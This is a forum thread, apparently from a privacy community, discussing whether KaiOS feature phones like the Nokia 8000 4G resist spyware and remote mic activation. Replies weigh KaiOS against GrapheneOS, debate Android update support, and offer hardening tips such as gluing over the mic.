Hey everyone,
I’m looking into using a Nokia feature phone running KaiOS (like the Nokia 8000 4G) for better privacy. My main concern is whether this OS is vulnerable to advanced spyware (like Pegasus-style attacks), especially things like remote mic or camera activation.
Has there been any known exploitation of KaiOS for surveillance purposes? Should I be worried about a bad actor activating my mic remotely on one of these devices?
Appreciate any insights.
Nobody will be able to answer that. The thing about zerodays is that they are unknown.
If believe you are a possible target for this i would highly recommend you tot use GrapheneOS instead. There is no way that this rather unknown OS is going to be any more safe.
what best practices would you take on graphene os in this case - for example not downloading whatsapp? any other?
Any OS which has has access to cameras/mics will inevitably enable malicious software to access those cameras/mics if compromised. Using a ancient hardware with an insecure OS is not a reasonable approach to avoiding remote exploitation. All programs inevitably contains vulnerabilities which is why you want something that is up to date with secure hardware, firmware, and software as well as modern exploit mitigations and good security practices like sandboxing.
Limiting apps andere features is always a good idea.
KaiOS 4.0 will be released soon and it’s based on android 14.
So the security will be better. The Nokia 8000 seem base on Kaios 2.5
I would not trust that.
I would wait for the TCL Flip 4 5G with Kaios 4.0.
Keep in mind, only the latest Android version has all the security fixes.
How is your comment related to KaiOS operating system ?
You said KaiOS version 4.0 will be based on Android 14, and Android 14 is already not receiving all the security fixes.
Android 13 and 14 are still receiving all the security fixes that apply to them.
Kaios is a different OS, but I am not an expert on Kaios.
Android 13 - 15 is still receving updates but Android 13 will end in around a year considering the release of Android 13 being on August 2022.
Now this doesn’t mean that KaiOS will be secure if they don’t timely deliver their updates (like cough Fairphone cough)
also: [source]
- Same APIs as KaiOS 3.0
take that for what you will in terms of security.
Also also, there’s no signal, not even whatsapp or whatever, why would you ever consider KaiOS at this state? Sure the Android 14 base may or may not change this but even then, the security concerns especially with maybe sideloading apks and even then if KaiOS will timely deliver security updates makes it a no go.
The mic alone on that phone if its the “Banana” 
looking phone, it’s pretty poor even on speaker phone.
If your concerned then open up the phone and fine the mic hole(s), not the speakers. Then obtain some superglue and baking soda and super glue applicator adapter and put glue in the mic hole(s) then sprinkle baking soda in their.
Pro-tip: Baking soda makes superglue dry super hard and fast.
I would take a look at this link
From what i can tell of this OS is that 3.0 and 3.1 had quite a few exploits that had the potential to be used to track and copy sensitive data.
Theoretically it is possible, but is more based off your threat model. If it is a government body then they could go through the effort to do so. A normal bad actor seems unlikely as there is not a high benefit based on the smaller install base compared to other operating systems.
Is there any reason to use this particular OS? It seems like an “in between” version of a dumb and smartphone without providing what is great about either.
I am not understanding how this is better for privacy than other smartphones since there tends to be built in ads to the vendor installed applications, there is no way to sandbox anything, the apps seem to have elevated access and can communicate with each other.
KaiOS seems to be selling you the illusion of security and privacy but when analyzed provides no hardening against exploitation or surveillance. Especially when phones rarely receive updates (none in several cases) leaving a large concern for security.
KaiOS is based in WebApps and it’s running Gecko. If there is a browser, try going into about:support to see the Firefox version. It should be either 128.X ESR or 138.
If above doesn’t work, try going into the browser settings to get the version.
If the browser is up to date, that is a sign that they care about security (not a silverbullet though).